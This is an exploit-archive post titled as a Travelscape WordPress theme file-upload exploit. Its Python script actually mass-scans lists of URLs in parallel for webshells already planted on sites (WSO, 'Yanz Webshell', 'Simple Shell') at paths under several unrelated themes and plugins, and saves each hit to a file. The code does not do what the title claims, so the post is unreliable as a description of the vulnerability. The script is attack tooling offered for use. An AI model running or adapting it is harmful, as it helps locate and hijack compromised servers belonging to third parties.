Headline
WordPress Travelscape Theme 1.0.3 Arbitrary File Upload
WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.
# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'Referer': 'www.google.com'}def URLdomain(url): if url.startswith("http://"): url = url.replace("http://", "") elif url.startswith("https://"): url = url.replace("https://", "") if '/' in url: url = url.split('/')[0] return urldef check_security(url): fg = success_color fr = error_color try: url = 'http://' + URLdomain(url) check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/about.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15) if '#0x2525' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'http://' + URLdomain(url) check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/epinyins.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15) if 'Simple Shell' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) except Exception as e: print(f' -| {url} --> {fr}[Failed] due to: {e}')def main(): try: url_file_path = sys.argv[1] except IndexError: url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ") if not os.path.isfile(url_file_path): print(f"{error_color}[ERROR] The specified file path isinvalid.") sys.exit(1) try: urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()] except Exception as e: print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}") sys.exit(1) pool = ThreadPool(20) pool.map(check_security, urls_to_check) pool.close() pool.join() print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__": main()